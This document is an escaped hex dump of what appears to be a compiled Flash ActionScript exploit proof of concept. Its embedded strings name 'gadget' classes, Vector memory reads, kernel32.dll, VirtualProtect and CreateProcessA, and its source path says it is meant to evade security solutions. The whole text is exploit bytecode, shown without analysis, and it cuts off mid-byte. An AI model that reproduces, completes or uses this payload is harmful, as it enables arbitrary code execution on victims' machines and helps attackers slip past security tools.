\\x11\\x1E\\x07\\x11\\x41\\x07\\x09\\x14\\x07\\x09\\x15\\x07\\x09\\x1A\\x07\\x11\\x23\\x07\\x09\\x16\\x07\\x11\\x44\\x07\\x11\\x04\\x1B\\x03\\x07\\x09\\x2A\\x07\\x09\\x27\\x07\\x09\\x2C\\x07\\x09\\x2B\\x07\\x09\\x28\\x07\\x11\\x29\\x07\\x11\\x2A\\x09\\x00\\x00\\x4C\\x00\\x01\\x35\\x35\\x17\\x80\\x13\\x02\\x00\\x35\\x35\\x1B\\x80\\x13\\x19\\x01\\x35\\x38\\x1F\\x80\\x13\\x01\\x35\\x38\\x25\\x80\\x13\\x02\\x00\\x47\\x48\\x30\\x82\\x13\\x19\\x01\\x36\\x35\\x34\\x80\\x31\\x00\\x00\\x36\\x00\\x00\\x00\\x06\\x00\\x0E\\x37\\x01\\x38\\x39\\x37\\x01\\x38\\x3A\\x37\\x01\\x38\\x3B\\x37\\x01\\x38\\x3D\\x37\\x01\\x38\\x3E\\x37\\x01\\x38\\x3F\\x37\\x01\\x38\\x40\\x37\\x01\\x38\\x42\\x37\\x01\\x38\\x43\\x37\\x01\\x38\\x45\\x37\\x01\\x38\\x46\\x37\\x01\\x38\\x48\\x49\\x01\\x38\\x4A\\x37\\x01\\x38\\x4B\\x01\\x2A\\x13\\x09\\x07\\x00\\x07\\x00\\x00\\x0C\\x0A\\x40\\x01\\x18\\x00\\x01\\x00\\x10\\x40\\x02\\x1F\\x00\\x01\\x01\\x16\\x40\\x03\\x0D\\x00\\x01\\x02\\x01\\x40\\x04\\x25\\x00\\x01\\x03\\x04\\x40\\x05\\x25\\x00\\x01\\x04\\x08\\x40\\x06\\x25\\x00\\x01\\x05\\x41\\x51\\x03\\x01\\x01\\x06\\x3D\\x51\\x04\\x02\\x01\\x07\\x37\\x51\\x05\\x03\\x01\\x08\\x43\\x51\\x06\\x04\\x01\\x09\\x46\\x51\\x07\\x05\\x01\\x0A\\x34\\x51\\x08\\x06\\x01\\x0B\\x01\\x08\\x01\\x2A\\x44\\x00\\x00\\x02\\x0C\\x0D\\x09\\x00\\x0A\\x01\\x03\\x04\\x50\\xD0\\x30\\xEF\\x01\\x02\\x00\\x09\\xEF\\x01\\x03\\x01\\x0A\\xEF\\x01\\x04\\x02\\x0B\\xEF\\x01\\x05\\x03\\x0C\\x5E\\x2F\\x5D\\x02\\x66\\x02\\x66\\x30\\x61\\x2F\\x5E\\x31\\x5D\\x02\\x66\\x02\\x66\\x32\\x46\\x06\\x00\\x2C\\x50\\x46\\x07\\x01\\x24\\x00\\xB0\\x61\\x31\\xEF\\x01\\x10\\x05\\x0E\\x5E\\x33\\x5D\\x02\\x66\\x02\\x66\\x32\\x46\\x06\\x00\\x2C\\x51\\x46\\x07\\x01\\x24\\x00\\xB0\\x61\\x33\\x47\\x00\\x00\\x01\\x09\\x02\\x03\\x04\\x37\\xD0\\x30\\xD1\\x25\\x80\\x20\\xAD\\x76\\x2A\\x76\\x12\\x04\\x00\\x00\\x10\\x06\\x00\\x00\\x29\\xD1\\x2F\\x01\\xB0\\x76\\x12\\x0A\\x00\\x00\\xF0\\x1B\\x5D\\x3E\\x2C\\x4C\\x4A\\x3E\\x01\\x03\\x5D\\x39\\x66\\x39\\xD1\\x61\\x3F\\xF0\\x1E\\x5D\\x39\\x66\\x39\\x46\\x42\\x00\\x48\\x00\\x00\\x02\\x09\\x03\\x03\\x04\\x37\\xD0\\x30\\xD1\\x25\\x80\\x20\\xAD\\x76\\x2A\\x76\\x12\\x04\\x00\\x00\\x10\\x06\\x00\\x00\\x29\\xD1\\x2F\\x01\\xB0\\x76\\x12\\x0A\\x00\\x00\\xF0\\x27\\x5D\\x3E\\x2C\\x4C\\x4A\\x3E\\x01\\x03\\x5D\\x39\\x66\\x39\\xD1\\x61\\x3F\\x5D\\x39\\x66\\x39\\xD2\\x46\\x40\\x01\\x29\\x47\\x00\\x00\\x03\\x09\\x02\\x03\\x04\\x14\\xD0\\x30\\x5D\\x39\\x66\\x39\\xD1\\x61\\x3A\\x5D\\x3B\\x66\\x3B\\x66\\x3C\\x82\\x24\\x01\\xA1\\x48\\x00\\x00\\x04\\x0A\\x03\\x03\\x04\\x74\\xD0\\x30\\x5D\\x37\\xD1\\x46\\x37\\x01\\x24\\x18\\x82\\xA0\\x74\\xD6\\xF0\\x38\\x5D\\x41\\xD2\\x46\\x41\\x01\\x74\\xD6\\x5D\\x44\\x66\\x44\\x96\\x11\\x10\\x00\\x00\\x10\\x48\\x00\\x00\\x09\\x5E\\x44\\x5D\\x44\\x66\\x44\\x24\\x04\\xA0\\x61\\x44\\x5D\\x44\\x66\\x44\\x24\\x32\\xAD\\x76\\x2A\\x76\\x12\\x14\\x00\\x00\\x29\\x5D\\x41\\xD2\\x5D\\x44\\x66\\x44\\xA0\\x46\\x41\\x01\\xD1\\x24\\x00\\x66\\x45\\xAB\\x96\\x76\\x11\\xCE\\xFF\\xFF\\xF0\\x3F\\x5D\\x44\\x66\\x44\\x24\\x32\\x0F\\x0A\\x00\\x00\\xF0\\x41\\x5D\\x3E\\x2C\\x4C\\x4A\\x3E\\x01\\x03\\xD2\\x5D\\x44\\x66\\x44\\xA0\\x48\\x00\\x00\\x05\\x0A\\x05\\x04\\x09\\xA3\\x01\\xD0\\x30\\x57\\x2A\\xD7\\x30\\xEF\\x01\\x26\\x02\\x48\\x65\\x01\\xD1\\x6D\\x01\\x65\\x01\\xD2\\x6D\\x02\\x65\\x01\\x24\\x00\\x74\\x6D\\x03\\x65\\x01\\x24\\x00\\x74\\x6D\\x04\\xF0\\x4C\\x65\\x01\\x65\\x01\\x6C\\x01\\x80\\x47\\x6D\\x05\\x5E\\x39\\x65\\x01\\x6C\\x05\\x61\\x39\\xF0\\x52\\x65\\x01\\x65\\x01\\x6C\\x05\\x66\\x4A\\x74\\x6D\\x03\\xF0\\x53\\x5E\\x3B\\x65\\x01\\x6C\\x02\\x61\\x3B\\x65\\x01\\x6C\\x03\\x2F\\x02\\x13\\x08\\x00\\x00\\x5D\\x3E\\x2C\\x4C\\x4A\\x3E\\x01\\x03\\xF0\\x58\\x5D\\x31\\x66\\x31\\x11\\x04\\x00\\x00\\x10\\x0E\\x00\\x00\\xF0\\x5B\\x5D\\x4B\\x66\\x4B\\x46\\x4C\\x00\\x29\\x10\\x0A\\x00\\x00\\xF0\\x5F\\x5D\\x3E\\x2C\\x4C\\x4A\\x3E\\x01\\x03\\xF0\\x62\\x47\\xF0\\x64\\x10\\x11\\x00\\x00\\xD0\\x30\\xD3\\x30\\x5A\\x00\\x2A\\x63\\x04\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\x67\\x47\\xF0\\x69\\x47\\x01\\x2F\\x89\\x01\\x8F\\x01\\x3E\\x49\\x05\\x1D\\x00\\x01\\x18\\x00\\x1E\\x00\\x02\\x1F\\x00\\x20\\x00\\x03\\x0D\\x00\\x21\\x00\\x04\\x0D\\x00\\x22\\x00\\x05\\x18\\x00\\x06\\x0A\\x02\\x03\\x04\\x01\\x47\\x00\\x00\\x07\\x08\\x01\\x04\\x05\\x0E\\xF1\\x12\\xF0\\x11\\xD0\\x30\\xF0\\x13\\xD0\\x49\\x00\\xF0\\x14\\x47\\x00\\x00\\x08\\x09\\x01\\x01\\x03\\x36\\x10\\x06\\x00\\x00\\x41\\x06\\x44\\x0B\\x06\\x03\\xD0\\x30\\xF1\\x12\\xF0\\x06\\x5D\\x2B\\x10\\x04\\x00\\x00\\x1A\\x1B\\x00\\x00\\x5D\\x13\\x66\\x13\\x30\\x5D\\x13\\x66\\x13\\x58\\x00\\x1D\\x68\\x2A\\xF1\\x12\\x10\\x05\\x00\\x00\\xD7\\x4A\\x09\\x0C\\xD4\\xF0\\x04\\x47\\x00\\x00\\xBF\\x14\\xF8\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x6D\\x78\\x2F\\x63\\x6F\\x72\\x65\\x2F\\x6D\\x78\\x5F\\x69\\x6E\\x74\\x65\\x72\\x6E\\x61\\x6C\\x00\\x10\\x00\\x2E\\x00\\x00\\x00\\x00\\x0A\\x43\\x45\\x3A\\x5C\\x64\\x65\\x76\\x5C\\x34\\x2E\\x79\\x5C\\x66\\x72\\x61\\x6D\\x65\\x77\\x6F\\x72\\x6B\\x73\\x5C\\x70\\x72\\x6F\\x6A\\x65\\x63\\x74\\x73\\x5C\\x66\\x72\\x61\\x6D\\x65\\x77\\x6F\\x72\\x6B\\x5C\\x73\\x72\\x63\\x3B\\x6D\\x78\\x5C\\x63\\x6F\\x72\\x65\\x3B\\x6D\\x78\\x5F\\x69\\x6E\\x74\\x65\\x72\\x6E\\x61\\x6C\\x2E\\x61\\x73\\x00\\x07\\x6D\\x78\\x2E\\x63\\x6F\\x72\\x65\\x0B\\x6D\\x78\\x5F\\x69\\x6E\\x74\\x65\\x72\\x6E\\x61\\x6C\\x2A\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x32\\x30\\x30\\x36\\x2F\\x66\\x6C\\x65\\x78\\x2F\\x6D\\x78\\x2F\\x69\\x6E\\x74\\x65\\x72\\x6E\\x61\\x6C\\x00\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x31\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x32\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x37\\x04\\x16\\x03\\x08\\x05\\x16\\x06\\x00\\x05\\x07\\x01\\x04\\x07\\x03\\x07\\x07\\x03\\x08\\x07\\x03\\x09\\x01\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x01\\x01\\x06\\x00\\x00\\x02\\x08\\x01\\x00\\x08\\x01\\x01\\x02\\x10\\xD0\\x10\\x05\\x00\\x00\\x40\\x06\\x41\\x06\\x03\\x30\\xF1\\x01\\xF0\\x0C\\x47\\x00\\x00\\xBF\\x14\\x42\\x0D\\x00\\x00\\x01\\x00\\x00\\x00\\x67\\x61\\x64\\x67\\x65\\x74\\x00\\x10\\x00\\x2E\\x00\\x05\\x00\\x80\\x80\\x80\\x04\\xFF\\xFF\\x03\\x80\\x80\\x04\\x00\\x02\\x00\\x00\\x00\\x00\\xE0\\xFF\\xEF\\x41\\x79\\x06\\x67\\x61\\x64\\x67\\x65\\x74\\x07\\x50\\x72\\x69\\x6D\\x69\\x74\\x31\\x02\\x1E\\x18\\x00\\x3B\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F\\x43\\x5F\\x74\\x72\\x79\\x69\\x6E\\x67\\x54\\x6F\\x45\\x76\\x61\\x64\\x65\\x53\\x65\\x63\\x53\\x6F\\x6C\\x75\\x74\\x69\\x6F\\x6E\\x73\\x66\\x6C\\x61\\x36\\x2E\\x61\\x73\\x06\\x70\\x61\\x72\\x61\\x6D\\x31\\x04\\x72\\x65\\x73\\x74\\x10\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x66\\x6C\\x61\\x73\\x68\\x31\\x30\\x30\\x30\\x04\\x75\\x69\\x6E\\x74\\x09\\x67\\x61\\x64\\x67\\x65\\x74\\x30\\x24\\x30\\x07\\x66\\x6C\\x61\\x73\\x68\\x33\\x32\\x07\\x66\\x6C\\x61\\x73\\x68\\x33\\x35\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x05\\x45\\x72\\x72\\x6F\\x72\\x08\\x70\\x6F\\x73\\x69\\x74\\x69\\x6F\\x6E\\x0C\\x72\\x65\\x61\\x64\\x55\\x54\\x46\\x42\\x79\\x74\\x65\\x73\\x0B\\x74\\x6F\\x4C\\x6F\\x77\\x65\\x72\\x43\\x61\\x73\\x65\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x01\\x6B\\x00\\x01\\x6E\\x01\\x65\\x00\\x00\\x01\\x6C\\x07\\x72\\x65\\x61\\x64\\x55\\x54\\x46\\x01\\x76\\x00\\x01\\x75\\x00\\x01\\x70\\x00\\x01\\x74\\x00\\x01\\x63\\x01\\x72\\x00\\x00\\x00\\x00\\x01\\x73\\x00\\x02\\x62\\x30\\x01\\x62\\x06\\x76\\x61\\x72\\x5F\\x31\\x32\\x04\\x73\\x69\\x7A\\x65\\x03\\x6F\\x66\\x74\\x02\\x66\\x74\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x33\\x03\\x69\\x6E\\x74\\x0E\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x67\\x61\\x64\\x67\\x65\\x74\\x30\\x06\\x70\\x61\\x72\\x61\\x6D\\x32\\x06\\x70\\x61\\x72\\x61\\x6D\\x33\\x07\\x5F\\x6C\\x6F\\x63\\x31\\x30\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x34\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x35\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x36\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x37\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x38\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x39\\x5F\\x07\\x5F\\x6C\\x6F\\x63\\x31\\x31\\x5F\\x07\\x5F\\x6C\\x6F\\x63\\x31\\x32\\x5F\\x09\\x66\\x6C\\x61\\x73\\x68\\x31\\x30\\x30\\x30\\x07\\x66\\x6C\\x61\\x73\\x68\\x37\\x30\\x06\\x56\\x65\\x63\\x74\\x6F\\x72\\x0C\\x67\\x61\\x64\\x67\\x65\\x74\\x2E\\x61\\x73\\x24\\x31\\x35\\x06\\x50\\x72\\x69\\x6D\\x69\\x74\\x0B\\x5F\\x5F\\x41\\x53\\x33\\x5F\\x5F\\x2E\\x76\\x65\\x63\\x07\\x66\\x6C\\x61\\x73\\x68\\x33\\x34\\x07\\x66\\x6C\\x61\\x73\\x68\\x33\\x36\\x05\\x41\\x72\\x72\\x61\\x79\\x04\\x63\\x61\\x6C\\x6C\\x05\\x61\\x70\\x70\\x6C\\x79\\x0E\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x67\\x61\\x64\\x67\\x65\\x74\\x31\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x24\\x31\\x09\\x75\\x6E\\x64\\x65\\x66\\x69\\x6E\\x65\\x64\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x0F\\x72\\x65\\x61\\x64\\x55\\x6E\\x73\\x69\\x67\\x6E\\x65\\x64\\x49\\x6E\\x74\\x04\\x70\\x75\\x73\\x68\\x06\\x6C\\x65\\x6E\\x67\\x74\\x68\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x34\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x35\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x30\\x33\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x30\\x35\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x34\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x37\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x38\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x39\\x03\\x72\\x65\\x73\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x30\\x34\\x06\\x53\\x74\\x72\\x69\\x6E\\x67\\x0E\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x0D\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x67\\x61\\x64\\x67\\x65\\x74\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x70\\x6F\\x73\\x03\\x31\\x34\\x35\\x03\\x31\\x37\\x37\\x03\\x32\\x39\\x32\\x03\\x33\\x38\\x32\\x04\\x33\\x32\\x31\\x32\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x04\\x34\\x34\\x31\\x34\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1C\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x63\\x74\\x6F\\x72\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x32\\x31\\x35\\x02\\x39\\x33\\x00\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x31\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x32\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x37\\x02\\x63\\x72\\x02\\x6E\\x65\\x0C\\x6B\\x65\\x72\\x6E\\x65\\x6C\\x33\\x32\\x2E\\x64\\x6C\\x6C\\x0E\\x76\\x69\\x72\\x74\\x75\\x61\\x6C\\x70\\x72\\x6F\\x74\\x65\\x63\\x74\\x0E\\x63\\x72\\x65\\x61\\x74\\x65\\x70\\x72\\x6F\\x63\\x65\\x73\\x73\\x61\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x32\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x32\\x11\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x72\\x6F\\x63\\x65\\x73\\x73\\x46\\x75\\x6E\\x63\\x08\\x66\\x69\\x6E\\x64\\x66\\x75\\x6E\\x63\\x3A\\x05\\x01\\x16\\x04\\x17\\x04\\x08\\x12\\x05\\x42\\x18\\x01\\x1A\\x01\\x1A\\x43\\x16\\x44\\x16\\x6C\\x16\\x6C\\x17\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x06\\x09\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x08\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x01\\x03\\x09\\x01\\x0A\\x0C\\x04\\x05\\x06\\x07\\x08\\x09\\x08\\x01\\x0A\\x0C\\x04\\x05\\x06\\x07\\x08\\x67\\x07\\x02\\x09\\x07\\x03\\x0B\\x07\\x03\\x0C\\x07\\x03\\x0D\\x07\\x02\\x0E\\x07\\x03\\x75\\x07\\x02\\x0F\\x07\\x02\\x10\\x07\\x04\\x11\\x07\\x02\\x1A\\x07\\x03\\x02\\x07\\x02\\x16\\x07\\x03\\x2B\\x07\\x03\\x2C\\x07\\x03\\x2D\\x07\\x03\\x2E\\x07\\x03\\x2F\\x07\\x03\\x30\\x07\\x03\\x31\\x07\\x03\\x23\\x07\\x02\\x32\\x07\\x03\\x3F\\x07\\x02\\x40\\x09\\x41\\x01\\x07\\x09\\x41\\x1D\\x19\\x01\\x01\\x1B\\x02\\x07\\x03\\x45\\x07\\x03\\x46\\x07\\x02\\x47\\x07\\x04\\x48\\x07\\x04\\x49\\x07\\x02\\x4C\\x07\\x02\\x4D\\x07\\x02\\x4E\\x07\\x02\\x4F\\x07\\x04\\x50\\x07\\x02\\x51\\x07\\x03\\x52\\x07\\x03\\x53\\x07\\x03\\x54\\x07\\x03\\x29\\x07\\x03\\x55\\x07\\x03\\x56\\x07\\x03\\x57\\x07\\x03\\x58\\x07\\x03\\x59\\x07\\x03\\x5A\\x07\\x03\\x5B\\x07\\x02\\x5C\\x07\\x03\\x66\\x07\\x03\\x01\\x07\\x02\\x43\\x09\\x01\\x03\\x07\\x02\\x68\\x07\\x0A\\x6D\\x07\\x0A\\x6E\\x07\\x0A\\x6F\\x07\\x0C\\x66\\x07\\x0A\\x0E\\x07\\x0A\\x16\\x07\\x0A\\x47\\x07\\x0A\\x4C\\x07\\x0A\\x09\\x1D\\x19\\x01\\x40\\x07\\x0A\\x4D\\x07\\x0A\\x4E\\x07\\x0A\\x0F\\x07\\x0A\\x4F\\x07\\x0A\\x51\\x09\\x41\\x04\\x1D\\x19\\x01\\x40\\x07\\x0C\\x46\\x07\\x0C\\x52\\x07\\x0C\\x53\\x07\\x0C\\x0C\\x07\\x0C\\x3F\\x07\\x0C\\x0B\\x07\\x0C\\x45\\x07\\x0C\\x02\\x07\\x0A\\x40\\x1D\\x19\\x01\\x40\\x1B\\x05\\x07\\x0A\\x1A\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x0C\\x0D\\x07\\x0C\\x76\\x07\\x0A\\x10\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x0C\\x77\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x0C\\x78\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x00\\x00\\x04\\x00\\x01\\x00\\x40\\x08\\x8C\\x01\\x01\\x03\\x06\\x00\\x40\\x33\\x02\\x03\\x00\\x40\\x40\\x40\\x4A\\x80\\x06\\x34\\x35\\x00\\x00\\x5D\\x02\\x00\\x00\\x5E\\x00\\x00\\x00\\x04\\x00\\x08\\x5F\\x01\\x60\\x61\\x5F\\x01\\x60\\x62\\x5F\\x01\\x60\\x63\\x5F\\x01\\x60\\x64\\x5F\\x01\\x60\\x65\\x5F\\x01\\x60\\x67\\x69\\x01\\x60\\x6A\\x5F\\x01\\x60\\x6B\\x01\\x34\\x35\\x09\\x06\\x00\\x05\\x00\\x00\\x06\\x5F\\x40\\x01\\x40\\x00\\x01\\x00\\x06\\x40\\x02\\x01\\x00\\x01\\x01\\x4D\\x51\\x03\\x01\\x01\\x02\\x64\\x51\\x04\\x02\\x01\\x03\\x4B\\x51\\x05\\x03\\x01\\x04\\x3B\\x51\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x34\\x44\\x00\\x00\\x02\\x06\\x07\\x07\\x00\\x08\\x01\\x04\\x05\\x0D\\xD0\\x30\\xEF\\x01\\x02\\x00\\x09\\xEF\\x01\\x03\\x01\\x0A\\x47\\x00\\x00\\x01\\x08\\x03\\x04\\x05\\x01\\x47\\x00\\x00\\x02\\x0C\\x03\\x05\\x0A\\xA4\\x06\\xD0\\x30\\x57\\x2A\\xD5\\x30\\x65\\x01\\x24\\x00\\x74\\x6D\\x01\\x65\\x01\\x24\\x00\\x74\\x6D\\x02\\xF0\\x19\\x65\\x01\\x24\\x00\\x74\\x6D\\x03\\x65\\x01\\x24\\x00\\x74\\x6D\\x04\\xF0\\x1B\\x65\\x01\\x24\\x00\\x74\\x6D\\x05\\xF0\\x1C\\x65\\x01\\x24\\x00\\x74\\x6D\\x06\\x65\\x01\\x24\\x00\\x74\\x6D\\x07\\xF0\\x1E\\x65\\x01\\x24\\x00\\x73\\x6D\\x08\\x65\\x01\\x5D\\x4E\\x5D\\x4C\\x5D\\x57\\x66\\x57\\x46\\x4C\\x01\\x46\\x4E\\x01\\x2F\\x01\\xA8\\x74\\x6D\\x01\\x65\\x01\\x65\\x01\\x6C\\x01\\x2D\\x02\\xA1\\x74\\x6D\\x02\\x10\\x3B\\x00\\x00\\x09\\xF0\\x26\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x46\\x4E\\x01\\x2D\\x03\\xA8\\x25\\xCD\\xB4\\x01\\x14\\x0D\\x00\\x00\\xF0\\x28\\x65\\x01\\x24\\x00\\x74\\x6D\\x01\\x10\\x22\\x00\\x00\\x65\\x01\\x6C\\x03\\x91\\x74\\x65\\x01\\x2B\\x6D\\x03\\x65\\x01\\x65\\x01\\x6C\\x02\\x2D\\x04\\xA1\\x74\\x6D\\x02\\x65\\x01\\x6C\\x03\\x25\\x80\\x04\\x15\\xBA\\xFF\\xFF\\x65\\x01\\x6C\\x01\\x76\\x11\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x30\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\x32\\x5E\\x58\\x65\\x01\\x6C\\x02\\x61\\x58\\xF0\\x33\\x65\\x01\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x24\\x3C\\xA0\\x46\\x4E\\x01\\xA0\\x74\\x6D\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x46\\x4E\\x01\\x25\\xD0\\x8A\\x01\\x14\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x36\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x25\\x84\\x01\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x04\\xF0\\x39\\x65\\x01\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x25\\x80\\x01\\xA0\\x46\\x4E\\x01\\xA0\\x74\\x6D\\x01\\x65\\x01\\x24\\x03\\x24\\x04\\xA2\\x74\\x6D\\x03\\x10\\x70\\x00\\x00\\x09\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x46\\x4E\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x24\\x0C\\x46\\x59\\x01\\x46\\x09\\x00\\x2C\\x72\\x14\\x35\\x00\\x00\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x24\\x03\\x24\\x04\\xA2\\xA1\\x46\\x4E\\x01\\x74\\x6D\\x05\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x24\\x04\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x06\\xF0\\x42\\x10\\x1B\\x00\\x00\\x65\\x01\\x65\\x01\\x6C\\x03\\x24\\x05\\x24\\x04\\xA2\\xA0\\x74\\x6D\\x03\\x65\\x01\\x6C\\x03\\x65\\x01\\x6C\\x04\\x15\\x84\\xFF\\xFF\\x65\\x01\\x6C\\x05\\x24\\x00\\xAB\\x76\\x2A\\x76\\x11\\x09\\x00\\x00\\x29\\x65\\x01\\x6C\\x06\\x24\\x00\\xAB\\x76\\x11\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x48\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\x4A\\x65\\x01\\x65\\x01\\x6C\\x05\\x65\\x01\\x6C\\x02\\xA0\\x74\\x6D\\x05\\xF0\\x4B\\x65\\x01\\x24\\x00\\x74\\x6D\\x03\\x10\\xE9\\x00\\x00\\x09\\xF0\\x4E\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x05\\x46\\x4E\\x01\\x74\\x6D\\x01\\x65\\x01\\x6C\\x01\\x24\\x00\\x14\\x0A\\x00\\x00\\xF0\\x51\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x46\\x54\\x00\\x46\\x09\\x00\\x2C\\x73\\x14\\x38\\x00\\x00\\xF0\\x56\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x06\\xA0\\x65\\x01\\x6C\\x03\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x07\\xF0\\x57\\x65\\x01\\x6C\\x08\\xC0\\x73\\x65\\x01\\x2B\\x6D\\x08\\x65\\x01\\x6C\\x08\\x24\\x01\\x0E\\x58\\x00\\x00\\x10\\x7E\\x00\\x00\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x46\\x54\\x00\\x46\\x09\\x00\\x2C\\x74\\x13\\x04\\x00\\x00\\x10\\x31\\x00\\x00\\x5E\\x5F\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x06\\xA0\\x65\\x01\\x6C\\x03\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x61\\x5F\\xF0\\x63\\x65\\x01\\x6C\\x08\\xC0\\x73\\x65\\x01\\x2B\\x6D\\x08\\x65\\x01\\x6C\\x08\\x24\\x01\\x17\\x2A\\x00\\x00\\x65\\x01\\x6C\\x03\\x91\\x74\\x65\\x01\\x2B\\x6D\\x03\\xF0\\x6B\\x65\\x01\\x65\\x01\\x6C\\x05\\x24\\x04\\xA